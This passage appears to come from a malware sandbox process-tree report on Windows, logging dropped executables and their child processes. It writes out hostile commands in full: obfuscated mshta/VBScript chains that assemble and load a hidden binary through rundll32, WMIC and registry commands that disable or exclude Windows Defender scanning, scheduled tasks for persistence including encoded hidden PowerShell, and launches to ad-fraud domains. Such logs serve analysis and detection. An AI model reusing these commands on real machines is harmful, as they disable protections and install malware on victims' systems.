C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe"C:\Users\Admin\Documents\vOsoiDDO3Q_G73JC3fZnrc96.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 2807⤵
- Program crash
-
C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe"C:\Users\Admin\Documents\QKmrSnwh4KXiHnMhxSZE9bqV.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe"C:\Users\Admin\Documents\ptMWvC5dONO_GiXZIiDN46y3.exe"8⤵
-
C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\9FYCmSt6meOsFYLuTdqw1vJu.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "9FYCmSt6meOsFYLuTdqw1vJu.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\J5vQKsMt5d8SFwzWTO3Fxk8I.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "J5vQKsMt5d8SFwzWTO3Fxk8I.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe"C:\Users\Admin\Documents\HkLf_4fWJBBP2aKw8B_EGPCJ.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 17289⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe"C:\Users\Admin\Documents\YmLtMJXE5kpG5PRH_W7AZRIX.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe"C:\Users\Admin\Documents\PlREWOPKJ6dQLCAu2xyyr7tT.exe"8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe"C:\Users\Admin\Documents\h1jIwRqS79rGCdmcelReC17s.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\2221701.scr"C:\Users\Admin\AppData\Roaming\2221701.scr" /S9⤵
-
C:\Users\Admin\AppData\Roaming\4873741.scr"C:\Users\Admin\AppData\Roaming\4873741.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6017135.scr"C:\Users\Admin\AppData\Roaming\6017135.scr" /S9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe"C:\Users\Admin\Documents\yU0_O9fPOQ35Bic99nCSDCEy.exe" silent8⤵
-
C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe"C:\Users\Admin\Documents\qR8T1u8Mf6IgWhERs6c5wOkA.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5356.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS6901.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfoNxSwpt" /SC once /ST 00:14:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\CCwdtYy.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp"C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp" /SL5="$603CC,506127,422400,C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe"C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe"C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
